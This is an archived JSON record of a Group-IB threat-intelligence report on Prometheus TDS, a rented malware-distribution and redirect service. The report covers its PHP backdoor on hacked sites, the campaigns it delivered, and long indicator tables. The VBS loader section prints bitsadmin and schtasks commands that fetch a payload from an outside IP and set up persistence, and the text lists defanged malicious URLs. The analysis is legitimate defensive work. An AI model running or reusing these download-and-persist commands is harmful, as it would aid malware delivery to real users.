{
	"id": "28284f12-28db-4f6a-8d00-510b2f5112fd",
	"created_at": "2026-05-05T02:45:16.920792Z",
	"updated_at": "2026-05-05T02:46:37.020889Z",
	"deleted_at": null,
	"sha1_hash": "cc948c06d8d86a53972435a2bbd308654ccc8a22",
	"title": "Prometheus TDS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5941530,
	"plain_text": "Prometheus TDS\r\nArchived: 2026-05-05 02:27:54 UTC\r\nIntroduction\r\nIn the spring of 2021, Group-IB’s Threat Intelligence analysts discovered traces of a malware campaign distributing\r\nHancitor. The researchers took an interest in an untypical pattern of the downloader’s distribution, which was subsequently\r\ndescribed by Unit 42 and McAfee researchers as a new technique designed to hide documents containing malicious links\r\nfrom web scanners’ radars. However, the data extracted by Group-IB’s analysts indicates that a similar pattern is also used to\r\ndistribute malware such as Campo Loader, IcedID, QBot, SocGholish, and Buer Loader.\r\nGroup-IB discovered at least 3,000 targets of separate malware campaigns that make use of the same scheme. By\r\nanalyzing the list of targets, the experts were able to establish the two most active campaigns. The first targeted individuals\r\nin Belgium, and the second targeted companies, corporations, universities, and government organizations in the United\r\nStates.\r\nBy analyzing the malware distribution campaigns, Group-IB’s experts were able to conclude that it was possible for them to\r\nbe carried out using the same MaaS solution. This assumption was later confirmed by Group-IB’s analysts after they found a\r\nsale notice for a service designed to distribute malicious files and redirect users to phishing and malicious sites —\r\nPrometheus TDS (Traffic Direction System) — on one of the underground platforms.\r\nDescription\r\nPrometheus TDS is an underground service that distributes malicious files and redirects visitors to phishing and\r\nmalicious sites. 
This service is made up of the Prometheus TDS administrative panel, in which an attacker configures the\r\nparameters of a malicious campaign: the malicious files to be delivered, and restrictions on users’\r\ngeolocation, browser version, and operating system.\r\nTo prevent victims of malicious campaigns from interacting with the administrative panel directly, which may result in the\r\nattacker’s server being disclosed and blocked, Prometheus TDS uses third-party infected websites that act as a\r\nmiddleman between the attacker’s administrative panel and the user. It should also be mentioned that the list of\r\ncompromised websites is added manually by the malware campaign’s operators. The list is uploaded by importing links\r\nto web shells. A special PHP file named Prometheus.Backdoor is uploaded to the compromised websites to collect data\r\nabout the visiting user and send it back to the administrative panel. After analyzing the data collected, the administrative\r\npanel decides whether to send the payload to the user and/or to redirect them to the specified URL.\r\nGroup-IB Threat Intelligence analysts extracted more than three thousand email addresses targeted in the first phase of the\r\nmalicious campaigns in which Prometheus TDS was used to send malicious emails. Analysis of the extracted data\r\nhelped identify the most active campaigns, one targeting individuals in Belgium (more than 2,000 emails) and the\r\nother targeting US government agencies, companies, and corporations in various sectors (banking and finance, retail, energy\r\nand mining, cybersecurity, healthcare, IT, and insurance) (more than 260 emails). 
The data about the identified targets of attacks\r\nusing Prometheus TDS and the companies affected as a result has been handed over to the US, German and\r\nBelgian CERTs.\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 1 of 37\n\nTargets of malicious campaigns with the use of Prometheus TDS\r\nAttack scheme using Prometheus TDS\r\nThe distribution of malware using Prometheus TDS is carried out in several stages.\r\nStage 1\r\nThe user receives an email containing one of the following elements:\r\nAn HTML file that redirects the user to a compromised site on which Prometheus.Backdoor is installed;\r\nA link to a web shell that redirects users to a specified URL, in this case to one of the addresses used by Prometheus\r\nTDS;\r\nA link to a Google Doc containing the URL redirecting users to a malicious link.\r\nThe implementation of malicious campaigns with the use of Prometheus TDS\r\nGoogle Docs files used by Prometheus TDS\r\nStage 2\r\nThe user opens the attachment or follows the link and is redirected to the Prometheus.Backdoor URL. Prometheus.Backdoor\r\ncollects the available data on the user.\r\nStage 3\r\nThe data collected is sent to the Prometheus TDS admin panel. This admin panel then decides whether to instruct the\r\nbackdoor to send a malicious file to the user and/or to redirect them to the specified URL.\r\nAnalysis of Prometheus.Backdoor\r\nMalicious campaigns using Prometheus TDS are carried out via hacked sites with Prometheus.Backdoor installed on them.\r\nThe backdoor is controlled through the admin panel.\r\nPrometheus TDS admin panel\r\nThe data exchange between the administrative panel and the backdoor is encrypted with an XOR cipher. 
The key for this\r\ncipher is explicitly hardcoded in the Prometheus.Backdoor settings, along with the address of the administrative panel used\r\nby the attackers to manage backdoors on infected sites.\r\nA fragment of the Prometheus.Backdoor code containing the address of the administrative panel, a key for encrypting\r\ntransmitted data, and functions for encrypting and decrypting data\r\nAfter the user visits the infected site, Prometheus.Backdoor collects basic information about them: IP address, User-Agent,\r\nReferrer header, time zone, and language data, and then forwards this information to the Prometheus admin panel.\r\nPart of the Prometheus.Backdoor code used to collect information about the user’s time zone\r\nPart of the Prometheus.Backdoor code showing the algorithm used to generate a request to the administrative panel for the\r\ntransfer of visitor data\r\nIf the user is not recognized as a bot, then, depending on the configuration, the administrative panel can send a\r\ncommand to redirect the user to the specified URL, or to send a malicious file. The payload file is served using special\r\nJavaScript code. Most often, the malicious software is delivered in weaponized Microsoft Word or Excel documents;\r\nhowever, the attackers also use ZIP and RAR files. In some cases, the user is redirected to a legitimate site immediately\r\nafter downloading the file, so it appears to them that the file was downloaded from a safe source.\r\nPart of the Prometheus.Backdoor code showing a method for serving malicious files\r\nMalware campaigns analysis\r\nCampo Loader\r\nAnalyzing the extracted files, Group-IB Threat Intelligence analysts found 18 unique malicious documents relating to the\r\nCampo Loader, aka the BazaLoader malware. 
After downloading the malware, the user is redirected to the DocuSign or\r\nUSPS sites as a distraction from the malware’s activity.\r\nA screenshot of a decoy document from the “Campo Loader” distribution campaign\r\nCampo Loader spreads through malicious macros in Microsoft Office documents. After the victim activates the macros,\r\nthe loader saves and then decodes the .dll file, which is executed through certutil. After the dumped .dll file is executed, it\r\nsends an HTTP request to its C\u0026C server:\r\nContent of the malicious macros\r\nThe server processes the incoming request and, depending on the victim’s geolocation (based on their IP address), decides\r\nwhether to send the payload or redirect them to Yahoo!, GNU, or other resources. The downloader takes its name from the\r\npath of the same name in the HTTP requests used to download malicious files during the second stage.\r\nRedirection to gnu.org\r\nIf the administrative panel gives the command to send the payload, then the user is redirected to the resource where it is\r\nstored or receives it directly from the C\u0026C server.\r\nResults of the request satisfying the server’s requirements to upload a second stage file\r\nAnalysis revealed that Campo Loader was used at various times to distribute TrickBot and Ursnif/Gozi bankers, etc.\r\nCampo Loader administrative panel\r\nHancitor\r\nMonitoring of Prometheus TDS revealed 34 malicious documents relating to the Hancitor malware, which is a downloader\r\ntrojan.\r\nA screenshot of a decoy document from the Hancitor distribution campaign\r\nAfter downloading the malicious document, the victim is either redirected to the DocuSign website, or to phishing sites\r\nusing IDN domains that imitate the sites of two US banks.\r\nA phishing page to which a user was redirected after downloading a malicious Hancitor payload, located on the IDN domain xn--keynvigatorkey-yp8g[.]com (https://urlscan.io/result/108463b8-7c0d-4644-9d2b-52cbca3426f8/)\r\nOne of the files identified (SHA1: 41138f0331c3edb731c9871709cffd01e4ba2d88) was sent in a phishing email containing a\r\nlink to a Google Doc. The document stored in Google Docs contained the link hXXps://webworks.nepila[.]com/readies.php.\r\nWhen the victim clicks on the link, a request is sent to Prometheus.Backdoor. The server then processes the data collected\r\nabout the user’s system and decides whether to send the payload or not.\r\nAn example of requests to a site containing Prometheus.Backdoor, with successful delivery of a malicious document and\r\nsubsequent redirection to DocuSign\r\nThe screenshot above shows that the response to the first request for the file “readies.php” is 937 bits, while the second one\r\nis 424,594 bits. This means that the server approved the victim’s device settings and the second request resulted in the\r\ndownload of the Base64-encoded file “0301_343810790.doc”. After downloading the file, the victim is redirected to Docusign.com.\r\nPart of the Prometheus.Backdoor code showing a malicious file distribution pattern\r\nThe saved file “0301_343810790.doc” is a .doc file containing malicious macros. After activating the macros in the\r\ndocument, the DLL file is dropped at c:\\users\\%username%\\appdata\\local\\temp\\Static.dll and executed using\r\nrundll32.exe. After the file has been executed, the following HTTP requests are sent:\r\nhxxp://api.ipify[.]org/\r\nhxxp://ementincied[.]com/8/forum.php\r\nhxxp://mymooney[.]ru/6fwedzs3w3fg.exe\r\nThe downloaded file “6fwedzs3w3fg.exe” (SHA1: 7394632d8cfc00c35570d219e49de63076294b6b) is a sample of Ficker\r\nStealer.\r\nIn April 2021, Unit 42 researchers partially analyzed this campaign. 
The experts also mention the Ficker Stealer, Cobalt\r\nStrike, and Send-Safe spambots in their research.\r\nQBot\r\nThe following documents were found among the files used to distribute the banking Trojan QBot.\r\nFilename SHA1\r\ndocument-12603942.xls 2d74e52ac0e3ebbf2bb4aabb6469cba9badd70eb\r\ndocument-348056604.xls db23b35b2c2b8bf413fb57ee9017127f651e0304\r\nThese documents are lure files that require macro activation when launched. As soon as the macros are activated, an HTTP\r\nrequest is sent to download the DLL file with the payload.\r\nDecoy document from the QBot distribution campaign\r\nThe malicious documents discovered sent requests to the following URL addresses:\r\nhttps://inpulsion[.]net/ds/0702.gif\r\nhttps://aramiglobal[.]com/ds/0502.gif\r\nThe content of malicious macros\r\nThe content of malicious macros\r\nUnfortunately, at the time of analysis, these files were no longer available. However, our data suggests that QBot is loaded\r\nvia these paths.\r\nIcedID\r\nOne of the malicious documents sent using Prometheus TDS distributed the banking Trojan IcedID, aka Bokbot.\r\nA screenshot of a decoy document from the IcedID malware distribution campaign\r\nAfter opening the document and running the macros, the office file attempted to download and run the DLL file at\r\nhXXp://denazao[.]info/images/1j.djvu. The file was not available at the time of analysis. A similar office document was\r\nfound on VirusTotal; it also downloaded the payload from hXXp://denazao[.]info/images/1j.djvu. After launching the\r\npayload, the request was sent to the IcedID C\u0026C server located at hXXp://twotimercvac[.]uno/.\r\nGraph representing the IcedID C2 environment\r\nVBS Loader\r\nDuring the analysis, the specialists found three samples of an unidentified VBS loader. 
After downloading these files, the\r\nuser is redirected to the USPS website. When the user clicks on a malicious link, Prometheus TDS asks the user to download\r\na ZIP archive containing a VBS script. After the script is launched, the payload is downloaded in the form of another VBS\r\nscript using bitsadmin. The downloaded file is launched using the Windows Task Scheduler by creating a task that runs\r\nthe VBS script every 30 minutes starting at 00:00.\r\nPart of the obfuscated VBS loader containing the URL for the payload download\r\nTo download and run the payload, the VBS script executes a set of special commands using bitsadmin and schtasks:\r\ncmd /k exit | exit \u0026 bitsadmin /create EncodingFirm \u0026 exit\r\ncmd /k exit | exit \u0026 bitsadmin /addfile EncodingFirm hXXp://155[.]94[.]193[.]10/user/get/ButPrinciple1619186669 C:\\Users\\\u003cUser\u003e\\AppData\\Local\\Temp\\DefineKeeps.tmp \u0026 exit\r\ncmd /k exit | exit \u0026 bitsadmin /resume EncodingFirm \u0026 exit\r\ncmd /k exit | exit \u0026 schtasks /create /sc minute /mo 30 /tn “Task Update ButPrinciple” /f /st 00:00 /tr C:\\Users\\\u003cUser\u003e\\AppData\\Local\\ButPrinciple\\ButPrinciple.vbs \u0026 exit\r\ncmd /k exit | exit \u0026 bitsadmin /complete EncodingFirm \u0026 exit\r\ncmd /k exit | exit \u0026 bitsadmin /reset \u0026 exit\r\nAt the time of analysis, there was only one similar VBS loader sample on VirusTotal, which was detectable by only one\r\nantivirus solution.\r\nAntivirus detection for file fcd8674f8df4390d90dad6c31a3dd6f33d6a74de\r\nBuer Loader\r\nWithin the campaign, the file “document010498(1).zip” was also distributed. It contained the file “document010498.jnlp”,\r\nwhich downloads the payload from the domain “secure-doc-viewer[.]com”.\r\nUnfortunately, at the time of analysis, the domain was not active. 
Based on the contents of the file, it seems reasonable to\r\nassume that it is a decoy document used to download files relating to the second stage.\r\nContents of the file document010498.jnlp\r\nAn analysis of the domain “secure-doc-viewer[.]com” by the experts using Group-IB’s graph revealed that the owner’s\r\nname, as indicated in the WHOIS records of the domain, is “artem v gushin.” The analysis also showed that this name is\r\nconnected to more than 50 domains.\r\nPart of the connections of the domain secure-doc-viewer[.]com according to WHOIS records\r\nAmong the related domains, researchers identified several using the same keywords:\r\npdfsecure[.]net\r\nsecurepdfviewer[.]com\r\ninvoicesecure[.]net\r\nThe domains are also related to .jnlp files, for example, “invoice.jnlp” (SHA1:\r\ne3249b46e76b3d94b46d45a38e175ef80b7d0526).\r\nContent of the invoice.jnlp\r\nSeveral studies indicate that the above domains are part of the Buer Loader distribution campaign.\r\nSocGholish\r\nThe analysis of the URLs of the compromised sites used in the Prometheus TDS infrastructure revealed that some of them\r\nredirect the user to the home page of the compromised website.\r\nPrometheus.Backdoor URL that redirects the visitor to the home page of the compromised site\r\nThrough research, it was discovered that these sites are used to distribute the SocGholish malware under the guise of\r\nGoogle Chrome browser updates.\r\nLoading a landing page with fake Google Chrome browser updates\r\nAt the same time, SocGholish uses a malicious file distribution pattern very similar to the script used by Prometheus TDS.\r\nWhen the user visits an infected site, they see a page with JavaScript code that contains a Base64-encoded ZIP archive with\r\na malicious file that will be downloaded if the user clicks on the “Update browser” button.\r\nPart of the SocGholish landing page\r\nTo the user, this page appears to be offering browser updates.\r\nScreenshot of the fake page offering a Chrome browser update\r\nFake VPN\r\nIn addition to distributing malicious files, Prometheus TDS is also used as a classic TDS to redirect users to specific sites.\r\nOne of these sites is the fake site of a well-known VPN provider located at hXXps://huvpn[.]com/free-vpn/. Clicking the\r\ndownload button initiates the download of a malicious EXE file from hXXps://windscribe.s3.us-east-2.amazonaws[.]com/Windscribe.exe (SHA1: f729b75d68824f200bebe3c3613c478f9d276501).\r\nA screenshot of a fake Windscribe download page\r\nViagra SPAM\r\nPrometheus TDS also redirected users to sites selling pharmaceutical products. Operators of such sites often have\r\naffiliate and partnership programs. Partners, in turn, often resort to aggressive SPAM campaigns to increase their\r\nearnings within the affiliate program. Analysis of the Prometheus infrastructure by Group-IB specialists revealed links that\r\nredirect users to sites relating to a Canadian pharmacy.\r\nThe use of Prometheus TDS for spam emails to redirect users to particular websites\r\nBanking phishing\r\nPrometheus TDS was also used to redirect users to banking phishing sites. For example, during a campaign active from\r\nMarch to May 2021, users who followed the link to Prometheus.Backdoor were redirected to fake sites that mimicked the\r\nsite of a German bank.\r\nExample of a phishing page used in the campaign involving Prometheus TDS https://urlscan.io/result/69c84104-f272-4c88-970f-a3131c0580ad/\r\nOffers to buy Prometheus TDS on underground forums\r\nThe analysis presented above describes several unrelated campaigns carried out by different hacker groups using\r\nPrometheus TDS. 
Working on the assumption that Prometheus TDS is a MaaS solution, Group-IB researchers\r\nanalyzed various underground forums in search of relevant offers and found a topic started by a user with the username\r\nMain.\r\nPrometheus TDS\r\nScreenshot of the offer to buy the Prometheus TDS\r\nScreenshot of the offer to buy the Prometheus TDS\r\nGroup-IB’s Threat Intelligence system discovered that the post offering Prometheus for sale was created in August 2020. The\r\nowner of the service claimed that Prometheus TDS is an ANTIBOT redirect system designed for sending out emails, working with\r\ntraffic, and social engineering. In addition, Prometheus TDS can validate web shells, create and configure redirects,\r\noperate via proxy, and work with Google accounts, etc. Moreover, the system is able to validate users based on a blacklist,\r\nwhich makes it possible for malicious links to avoid being added to antivirus and spam databases.\r\nPrometheus has two standard modes:\r\n1. Redirecting users to a target page;\r\n2. Issuing files for download (DOC, PDF, JS, VBS, EXE).\r\nThe cost of the system is $250 per month. Screenshots from the Prometheus TDS admin panel provided by Main can be found\r\nbelow:\r\nBRChecker\r\nWhen examining and monitoring the infrastructure used to host the Prometheus TDS administrative panels, Group-IB\r\nexperts discovered that some of the servers on which the Prometheus TDS admin panel was previously located now host\r\nanother unknown panel.\r\nThe following is a list of addresses at which different panels were located at different times:\r\n188.130.138[.]63;\r\n188.130.138[.]22;\r\n188.130.138[.]236;\r\n188.130.138[.]61;\r\n185.186.142[.]32.\r\nBased on the contents of this admin panel’s JS scripts, Group-IB experts assumed that it is a panel from another solution\r\ncalled BRChecker.\r\nListing of scripts from BRChecker admin panel\r\nAn offer to sell the BRChecker system, presented as an email address bruter\\checker, was first posted by the user\r\nwith the username Main in mid-June 2018. According to the developer’s description, the system works via modules\r\n(workers) installed on rented VPS servers and controlled through a single admin panel for subsequent brute-forcing or\r\nverification of login/password bindings.\r\nScreenshot of a sale announcement for BRChecker\r\nAs of May 2021, the cost of the system was $490. 
Screenshots of BRChecker admin panel provided by Main can be found\r\nbelow:\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 24 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 25 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 26 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 27 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 28 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 29 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 30 of 37\n\nScreenshot of the BRChecker admin panel\r\nThe contents of the screenshots in the for-sale notice made it possible to verify that the unknown panel detected\r\nbefore is indeed related to BRChecker.\r\nIndicators\r\nPrometheus.Backdoor JavaScript\r\nMD5 SHA1 SHA256\r\n2e515f89c1e57a82f439f160bdc91045\r\n87b16517171f\r\n993b8e0932cf9c27ae8afec169d6\r\n2777c710350668010542846968025d642d40984fa87ad21\r\nc5bc239bb990ca808b5645078c6710d1 a9964c999a28c850ef3fbb061d8272025ac38aaf 2f58ac50edbc16d8aa708d2f6b928076c3411a2fdeefa3031\r\nPrometheus TDS Admin\r\n109.248.11.132\r\n109.248.11.204\r\n109.248.11.67\r\n109.248.203.10\r\n109.248.203.112\r\n109.248.203.168\r\n109.248.203.198\r\n109.248.203.202\r\n109.248.203.207\r\n109.248.203.23\r\n109.248.203.33\r\n185.158.114.121\r\n185.186.142.191\r\n185.186.142.32\r\n185.186.142.59\r\n185.186.142.67\r\n185.186.142.77\r\n188.130.138.130\r\n188.130.138.22\r\n188.130.138.236\r\n188.130.138.57\r\n188.130.138.61\r\n188.130.138.63\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 31 of 37\n\n188.130.138.70\r\n188.130.139.103\r\n188.130.139.203\r\n188.130.139.228\r\n188.130.139.5\r\n188.130.139.88\r\n46.8.210.13\r\n46.8.210.30\r\n51.15.27.25\r\n62.138.0.68\r\nCampo Loader\r\nFilename MD5 SHA1 SHA256\r\norder-details-706518.xlsb\r\n0dcd730d8bb4e11b15a18b1dc76fc495 077baa375c2eea771867884cc8eeb632761346c9 a1b1abdf519253a124507080\r\nuser-Payment.xlsb 96e55bf478df6538526fb27d93ae0cff 143034d966a0a8fa125d3cfa2c59f8f6bc077fd1 
baa41b445333a1763c335f6c\r\nuser-Payment.xlsb 2c3beba27a366bc0cdca9311b53bbeb9 21f6dc1ce6ae5c47e3fbb3f65fdf43deef90f022 452f2a77f8ebd6aaeb99456dc\r\nuser-Payment.xlsb fd7e9a5318d9a9a64ae6fcda0fecf775 2327e25fd5fda04562b7541d772fb56a4573588e a7bf77112ee1d7c856d90366\r\nkirill_gelfand-Payment.xlsb\r\n0e813468897ad3c4c13ed181808c07f1 2ae9e9b711cabfa5ed84786a5b40caa458188442 4dd8ba0d5ac44a54b2192267\r\nInformation_78333.xlsb 779f1cd885dfc236f72803640408d194 2fbba4ede1959b87c221e48b53566e9861b445b9 e8282f5b348181a9986c759c\r\nadir_raz-Payment.xlsb 1cae28a21a78769749abb5f1b861f35f 2fe310539baeba8f254c85bc36ec21a66d73d7d8 1d5d97a5cb51c4d83dfdd662\r\nDocument_898285.xlsb 1bf18263da33a285acc74ff2759ad84e 4306a7fd5c5f91e7508448621e3895a57e38cfce 88ae71852b61934d4d3e27b6\r\nAttachment_89237.xlsb 46135129250f719456a5053b3eced9a0 43a991b86b533fc1af8d4bb12f41c666f9187764 370ab9a4ac29c2c7a121de17\r\nuser-Payment.xlsb f2927864387a2fe4019ad0aa9113254e 743d4727f828bf2247e5ab2745266194acb44405 97b912e93c00743cced68f7a\r\nuser-Payment.xlsb 2946f055d65da4ec48541d9237d7e157 9b8b5dd6df5b7ea73d2996731abb85178b8f3791 d26a56178fd6d15d1e6a8a15\r\nAttachment_64302.xlsb dcf728310285350f57d2b39c036e8b96 9f45863dc4381863a9b9533907b9aaf016211c36 8f329f8fd20acb25617c0d49d\r\nmolly.appelfeller-Payment.xlsb\r\ncdae61158a97d8bbda68ca756b02aa49 b391fde8dab17a03d9ebddcb628234c1ed203028 d21bb891b88039e9e0d00144\r\ndamian.piwowar-Payment.xlsb\r\ncdae61158a97d8bbda68ca756b02aa49 b391fde8dab17a03d9ebddcb628234c1ed203028 d21bb891b88039e9e0d00144\r\nuser-Payment.xlsb b8b2409c15aa18979084f4ba779df954 bf7cc9f91cc32937449ddc2f8627b1462099c7ee 9462ed453e355c587086a200\r\nuser-Payment.xlsb 77f8fdcca8db0aedd0e02a14a13cad1b c22ab2bc79be021552b7116f7582b6c66a5bee3b 2dc953ad0703d0e921c6e840\r\nmargaret.crain-Payment.xlsb\r\nc7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nphillip.taylor-Payment.xlsb\r\nc7d0e439b2020d32bef71af529334fa6 
ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nkate.sullivan-Payment.xlsb\r\nc7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\ntom.powell-Payment.xlsb\r\nc7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nmolly.appelfeller-Payment.xlsb\r\nc7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\ntonya.cronce-Payment.xlsb\r\nc7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nzmaslen-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nuser-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nzach.arko-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 32 of 37\n\nFilename MD5 SHA1 SHA256\r\nsjenner-Payment.xlsb 10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8\r\nkate.sullivan-Payment.xlsb\r\n10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8\r\nuser-Payment.xlsb 10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8\r\ndarshana.govindan-Payment.xlsb\r\n10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8\r\nmatt.harp-Payment.xlsb 10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8\r\npbamola-Payment.xlsb 1598cbcca37f6d92037ad5569b152ffa efa8af362029314cafdb5cd3b21acba0c3398b37 b629d7b71d99c562955ed114\r\nHancitor\r\nFilename MD5 SHA1 SHA256\r\n0208_5712084086062.doc 5797d7959a374447e004251696460f83 050990c1fd000aaf8e97eb4d08f349b5b9ccbb32 
d600a2c30a57b53a650\r\n0211_18408623163382.doc f919678ac7cc958eea115481a871f781 1f166d3b7dd1d5b20fd86071755bcb294724ba92 8d29410ee9bd9f4004e\r\n0301_203089882.doc dd655abe26d4749ee69cd8ddff49298f 1ff915cb2697fea83433bcf920a6ae45ba3c9b4e 5f0f68a7db1d84e3ab93\r\n0318_41975026189871.doc c5792ce2154c652d9102fa4982dcfce3 32b5eaa378aa90610b40c88b3fbdace3f21b7021 121e2902c085cf41c9b9\r\n0301_343810790.doc 4fa931626b5cfaa706213db17d0c61dc 41138f0331c3edb731c9871709cffd01e4ba2d88 b7efa1277c0c0fba7549\r\n0406_19770546653272.doc e888673d08cbd88933e71d86d9906962 4701ebac8766510ef789c1a47d144779f0b899c0 1477b09d53363d8f4c7\r\n0211_41566363811571.doc 502041f49fa41b8548dd4ab95557448e 4f66ac0d73b73f5fed2159dccc7c64761d70088a 9b8cfb1a250908b51fcc\r\n0318_98323640085061.doc ed8d3539a3e027ec713cb7eddbb0dcf6 5253b7e09168b17bc8bfd7938e6ee054f5b5bb59 1d11fee370ab3997737f\r\n0318_98323640085061.doc ed8d3539a3e027ec713cb7eddbb0dcf6 5253b7e09168b17bc8bfd7938e6ee054f5b5bb59 1d11fee370ab3997737f\r\n0211_2442680243981.doc 63937ba70f16090c167212a5d8c0b2a1 55606e6d1d2806a6b13b88b1fed1e3f9dea6a035 eb8b21c4d9e48ec3d6d\r\n0406_85921776082182.doc fc7fac4b8e77b228f967cd25c39476fa 5b22b18112adbc9cc6db64728f6320b42ef9a66f 715aa88e5563d87cfec5\r\n0324_2126179849261.doc 53b94d001b82e06e57eca67254be3b19 5bd4058c15a3622e70e07a20e1d3ea52dd7a5c60 97dc8e1752f48c022db\r\n0216_2334240256090.doc 8333b8ae870a2cef892130cf985b3d08 632918f8023469a096ef664384446c75e0cd4f2c f3bd817ae5e3e96728ad\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 33 of 37\n\nFilename MD5 SHA1 SHA256\r\n0208_34749245710860.doc be5c90e2315d4db22d323adfdc3057f6 6d99dec7ab17caa1da6f12483f39151f6e70ea91 cee3c07353da4b23dc0\r\n0208_51143810436132.doc 5b991aedb6e96930489fa43aa34afb2c 706a91588eab2b1ded0c93c30d6613b456b2cd8b daa52d10cb1b1df7c372\r\n0208_51143810436132.doc 5b991aedb6e96930489fa43aa34afb2c 706a91588eab2b1ded0c93c30d6613b456b2cd8b daa52d10cb1b1df7c372\r\n0301_528419802.doc 76fc62eb1167875ec254929fed4cea3e 
[Indicator tables omitted: malicious document samples, Qbot, IcedID, VBS Loader, Buer Loader, SocGholish and Fake VPN (each listing Filename, MD5, SHA1, SHA256); Pharma spam domains; Phishing websites; Other samples (MD5, SHA1, SHA256); BRChecker Admin panel IP addresses]\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 34 of 37\r\nSource: https://blog.group-ib.com/prometheus-tds",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.group-ib.com/prometheus-tds"
	],
	"report_names": [
		"prometheus-tds"
	],
	"threat_actors": [],
	"ts_created_at": 1777949116,
	"ts_updated_at": 1777949197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cc948c06d8d86a53972435a2bbd308654ccc8a22.pdf",
		"text": "https://archive.orkl.eu/cc948c06d8d86a53972435a2bbd308654ccc8a22.txt",
		"img": "https://archive.orkl.eu/cc948c06d8d86a53972435a2bbd308654ccc8a22.jpg"
	}
}